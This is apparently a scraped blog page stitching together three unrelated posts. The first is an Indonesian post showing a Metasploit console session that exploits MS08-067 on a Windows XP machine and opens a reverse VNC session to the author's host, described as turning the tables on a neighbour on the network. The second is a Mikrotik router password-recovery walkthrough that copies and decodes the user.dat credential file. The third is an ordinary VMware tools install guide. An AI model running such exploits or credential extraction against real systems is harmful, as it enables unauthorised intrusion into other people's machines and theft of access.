REMOTE DESKTOP WINDOWS XP IN METASPLOIT
untungnya sj sy blom login di emal,Fb dll. ternyata ehh ternyata ada pake netcut,tuxcut ato apalah lucuhnya lagi org itu spoofing sy kata org chee...mo nyadap pass: tp sayang sy nyadap duluan hehehehehehe...
yuk ngintip org jahat
to the poin aja the
bash-4.1$ su
Password:
oot *-* vim-n4n0:/home/vim-n4n0# msfconsole
>>>M3T45PL01T3<<<<<
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 567 exploits - 283 auxiliary
+ -- --=[ 211 payloads - 27 encoders - 8 nops
=[ svn r9861 updated 117 days ago (2010.07.19)
Warning: This copy of the Metasploit Framework was last updated 117 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show exploits
msf exploit(ms08_067_netapi) > set RHOST 192.168.2.109 ====>(IP TARGET)
RHOST => 192.168.2.109
msf exploit(ms08_067_netapi) > set LHOST 192.168.2.111 ====>(IP SAYA)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.2.111:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.2.109
[*] VNC Server session 2 opened (192.168.2.111:4444 -> 192.168.2.109:2040) at 2010-11-13 23:24:22 +0800
[*] Starting local TCP relay on 127.0.0.1:5900... ======> LOCALHOST (PORT 5900)
[*] Local TCP relay started.
[-] Failed to launch vncviewer. Is it installed and in your path? ========> (AKTIFKAN REMOTE DESKTOP VIEWER FOR SLACKWARE)
[*] Session 2 created in the background.
msf exploit(ms08_067_netapi) >
nah ada failed the ...[-] Failed to launch vncviewer. Is it installed and in your path? knp failed ??? tanya ibu budi...hehehehe
nih image...target sy yg mo nyoba-nyoba nyadap pass: orang..
Password recovery for Mikrotik Router (installed on PC/Computer)
Thing that you must have for this password recovery procedure are linux live CD (I use Ubuntu Live CD) and linux system with g++ compiler.
First step, boot your mikrotik PC router using linux live CD and mount the mikrotik drive (it should be ext3 file system), after successfully mounted, copy the ‘mikrotik password file’, (it located in /mnt/nova/store/user.dat) to USB flash drive, we will decode the password file.
The file path is relative, depend where you mount the mikrotik drive, for example if you mount your mikrotik drive in /mnt/media, the mikrotik password file should be /mnt/media/mnt/nova/store/user.dat
In Ubuntu Live, if you can not copy the file, may be you need to become root, use this command below :
$sudo su
After become ‘root’ copy the ‘mikrotik password file’ in to USB flash drive, The USB flash drive should be ‘plug and play’ in Ubuntu Live.
After we got password file, we can decode it, downlod the the password decoder here. After extract the decoder file you can compile it using g++ compiler, or you can use my binary version. I compile it on debian linux, using g++ version 4.1, you may need issue chmod +x in tho this binary file. You can download here.
Here the some password decode process :
Sorry I make the password ‘blury’
Ok you got the password now, you can login into mikrotik pc router now
VMware
Introduction
VMware is well known and has a reputation for ease of use. Many of its core products are free of charge (but not open source).
Also note that with AMD x86_64 it is necessary to install ia32-libs.
VMware Player is the most basic version of VMware available. It's designed to play existing VM images. There are many existing, downloadable images for free Operating Systems. In addition, sites like EasyVMX allow for free creation of new VMXs, allowing Windows to be installed and ran in VMware player.
VMware Workstation is more advanced, including an inbuilt VM creator, and snapshots to capture an OS at a point in time. With VMWare workstation you can also use an existing physical partition as a virtual machine. VMware workstation requires a paid license to use.
VMware Server is aimed at hosting virtual servers (as the name suggests), including a configuration console and web based configuration access. This is also free from VMware. AMD64 users should also see VMware/Server/AMD64
Installing Ubuntu in a Virtual Machine
- Download Ubuntu .iso
- Create a new VM with vmware server or workstation
- Directions to create image for vmware-player using qemu-img should be linked here
Installing VMware tools
VMware tools allows you to sync your virtual machine, run scripts on stopping, and do a few other things. What's missing, seemingly, is the ability to use the mouse without capturing focus first.
As of now, there is no .deb available, so run the following commands:
sudo apt-get install build-essential
sudo apt-get install linux-headers-`uname -r`
The vmtools rely on the config.h header file, which does not exist anymore with recent kernels. As a workaround, you'll have to create a dummy file:
sudo touch /usr/src/linux-headers-`uname -r`/include/linux/config.h
Now you’ll want to navigate to the VM \ Install VMware Tools menu within your virutal machine
This will mount the vmware tools in Ubuntu so that you can begin the install. To install the tools, copy the .tar.gz to your desktop. Right-click it and "extract here". Now open a terminal and type
sudo ./Desktop/vmware/vmware-install.pl -d
(please note the
means to actually hit the tab key to enable autocomplete to finish the foldername).
Reboot your virtual machine when finished. After rebooting, you can run vmware tools config
vmware-toolbox
- Also note that vmware-toolbox has to be running for the mouse to be able to jump back and forth between the guest os and host os without hitting ctrl+alt. This is not ideal, but you could use 'alltray' to get the vmware-toolbox to the tray instead of the taskbar. It's also GTK1... bleh!
Support
VMware/Tools - Various tools to improve performance and usage of VMware products.